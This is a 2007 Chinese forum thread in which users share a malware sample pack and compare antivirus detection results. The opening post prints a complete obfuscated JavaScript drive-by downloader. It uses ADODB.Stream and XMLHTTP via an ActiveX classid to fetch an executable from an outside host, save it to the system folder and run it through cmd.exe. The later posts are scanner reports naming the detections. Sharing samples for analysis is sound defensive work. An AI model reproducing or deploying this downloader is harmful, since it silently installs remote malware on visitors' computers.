一包html和一个ani

显示全部楼层 · 发表于 2007-8-2 11:37:29

cuteqq的新式代码谁来解一下~

<script language="JavaScript">

</script>
<noscript>
<iframe src=*></iframe>
</noscript>
<script>
document.writeln("<script language=javascript>");
document.writeln("function wwwcuteqqcn2(n) ");
document.writeln("{ ");
document.writeln("var Cuteqq2 = Math.random()*n; return 'ssmss'+Math.round(Cuteqq2)+'.exe';");
document.writeln("} ");
document.writeln("Wm=\"Qq784378237\";");
document.writeln("try ");
document.writeln("{ Cuteqq2=\"\157\142\";");
document.writeln("Cuteqq3=\"\x6A\x65\";");
document.writeln("Cuteqq4=\"\143\164\";");
document.writeln("Cuteqq5=\"\x41\x64\x6F\x64\x62\x2E\";");
document.writeln("Cuteqq6=\"\123\164\162\145\141\155\";");
document.writeln("Cuteqq7=\"\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\";");
document.writeln("Cuteqq8=\"\130\115\114\110\124\124\120\";");
document.writeln("Cuteqq9=\"\x6F\";");
document.writeln("Cuteqq10=\"\160\";");
document.writeln("Cuteqq11=\"\x65\";");
document.writeln("Cuteqq12=\"\156\";");
document.writeln("Cuteqq='http://cool.47555.com/xx.exe';");
document.writeln("Wm2=\"Qq784378237\";");
document.writeln("id=\"\143\154\141\163\163\151\144\";");
document.writeln("id2=\"\x63\x6C\x73\x69\x64\x3A\";");
document.writeln("id3=\"\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\";");
document.writeln("id4=\"\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\";");
document.writeln("idx=id2+id3+id4;");
document.writeln("var Cuteqqcn=document.createElement(Cuteqq2+Cuteqq3+Cuteqq4);");
document.writeln("Cuteqqcn.setAttribute(id,idx);");
document.writeln("Wm3=\"Qq784378237\";");
document.writeln("var Cuteqqcn2=Cuteqqcn.CreateObject(Cuteqq7+Cuteqq8,\"\");");
document.writeln("var Cuteqqcn3=Cuteqqcn.CreateObject(Cuteqq5+Cuteqq6,\"\");");
document.writeln("Cuteqqcn3.type=1;");
document.writeln("Cuteqqcn2.open(\"GET\", Cuteqq,0);");
document.writeln("Cuteqqcn2.send();");
document.writeln("Wm4=\"Qq784378237\";");
document.writeln("Chilam=wwwcuteqqcn2(10000);");
document.writeln("var Chilam2=Cuteqqcn.CreateObject(\"Scripting.FileSystemObject\",\"\");");
document.writeln("var tmp=Chilam2.GetSpecialfolder(0);Chilam= Chilam2.BuildPath(tmp,Chilam);");
document.writeln("Wm5=\"Qq784378237\";");
document.writeln("Cuteqqcn3.Open();");
document.writeln("Chilam3=Cuteqqcn2.responseBody;");
document.writeln("Cuteqqcn3.Write(Chilam3);");
document.writeln("Cuteqqcn3.SaveToFile(Chilam,2); Cuteqqcn3.Close();");
document.writeln("Wm6=\"Qq784378237\";");
document.writeln("var Chilam3=Cuteqqcn.CreateObject(\"Shell.Application\",\"\");");
document.writeln("wwwcuteqqcn=Chilam2.BuildPath(tmp+'\\\\system32','cmd.exe');");
document.writeln("Chilam3.sHelLExEcuTe(wwwcuteqqcn,' /c '+Chilam,\"\",Cuteqq9+Cuteqq10+Cuteqq11+Cuteqq12,0);");
document.writeln("Wm7=\"Qq784378237\";");
document.writeln("} catch(WwwCuteQqCn) { WwwCuteQqCn=1; }");
document.writeln("</script\>");
</script>
<script type="text/jscript">function init() { document.write("www.cuteqq.cn");}window.onload = init;</script>
<body >

显示全部楼层 · 发表于 2007-8-2 11:38:30

发现这家伙报的都很准确

ArcaMicroScan - Scanning report [2007.08.02 11:38:09]
Base date : 2007.08.01 08:03:30

[Scanning : F:\virus]

F:\virus\Ignore.rar<RAR>:vip1.htm <- JScript.Psyme.N : Cleaning -> Delete

Scanned objects : 10

Infected objects : 1

显示全部楼层 · 发表于 2007-8-2 11:39:09

漏掉的补上

显示全部楼层 · 发表于 2007-8-2 11:39:28

2007-8-2 11:37:35,Script.HttpDownloader.i,病毒,Administrator,G:\样本\样本\Ignore.rar>>vip.htm,Manual scan
2007-8-2 11:37:35,Script.HttpDownloader.g,病毒,Administrator,G:\样本\样本\Ignore.rar>>vip5.htm,Manual scan
2007-8-2 11:37:34,Script.HttpDownloader.i,病毒,Administrator,G:\样本\样本\Ignore.rar>>vip4.htm,Manual scan
2007-8-2 11:37:34,Script.HttpDownloader.a,病毒,Administrator,G:\样本\样本\Ignore.rar>>vip1.htm,Manual scan
2007-8-2 11:37:34,Exploit.ANI.c,病毒,Administrator,G:\样本\样本\Ignore.rar>>935474.c,Manual scan

显示全部楼层 · 发表于 2007-8-2 11:41:45

原帖由 tracydk 于 2007-8-2 11:38 发表
发现这家伙报的都很准确
ArcaMicroScan - Scanning report [2007.08.02 11:38:09]
Base date : 2007.08.01 08:03:30

[Scanning : F:\virus]

F:\virus\Ignore.rar:vip1.htm Delete

...

不准确 vip1是adodb流……
antivir对了……
解了半天解开了发觉下载是死的%

显示全部楼层 · 发表于 2007-8-2 11:44:28

D:\download\t3\Ignore.rar:\935474.c
D:\download\t3\Ignore.rar:\vip1.htm
D:\download\t3\Ignore.rar:\vip2.htm
D:\download\t3\Ignore.rar:\vip3.htm
D:\download\t3\Ignore.rar:\vip4.htm - Signature 'Trojan-Downloader.JS.Psyme.jg' found
D:\download\t3\Ignore.rar:\vip5.htm
D:\download\t3\Ignore.rar:\vip6.htm - Signature 'Exploit.JS.XMLCore.a' found
D:\download\t3\Ignore.rar:\vip7.htm
D:\download\t3\Ignore.rar:\vip.htm
D:\download\t3\Ignore.rar

10 Files scanned
(1 Archive with 9 files)
2 Signatures found
0 Suspect code-parts found
Used time: 0:00.220

显示全部楼层 · 发表于 2007-8-2 11:46:20

nod32不杀html。。。。估计明年的今天才会杀

显示全部楼层 · 发表于 2007-8-2 13:57:00

只杀了一个
瑞星病毒查杀结果报告

清除病毒种类列表：
病毒： Hack.Exploit.Agent.cw

MAC地址：00:D0:F8:38:4B:7A

用户来源：局域网

软件版本：19.34.31

显示全部楼层 · 发表于 2007-8-2 14:00:45

江民只杀掉了一个HTM文件。。

显示全部楼层 · 发表于 2007-8-2 14:01:24

\Ignore.rar
  [0] Archive type: RAR
  --> 935474.c
   [DETECTION] Contains signature of the exploits EXP/Ani.Intended.Gen
  --> vip1.htm
   [DETECTION] Contains signature of the HTML script virus HTML/ADODB.Exploit.Gen
  --> vip4.htm
   [DETECTION] Contains suspicious code HEUR/Exploit.HTML
  --> vip5.htm
   [DETECTION] Contains suspicious code HEUR/Exploit.HTML
  --> vip6.htm
   [DETECTION] Contains suspicious code HEUR/Exploit.HTML

[病毒样本] 一包html和一个ani

本帖子中包含更多资源

本帖子中包含更多资源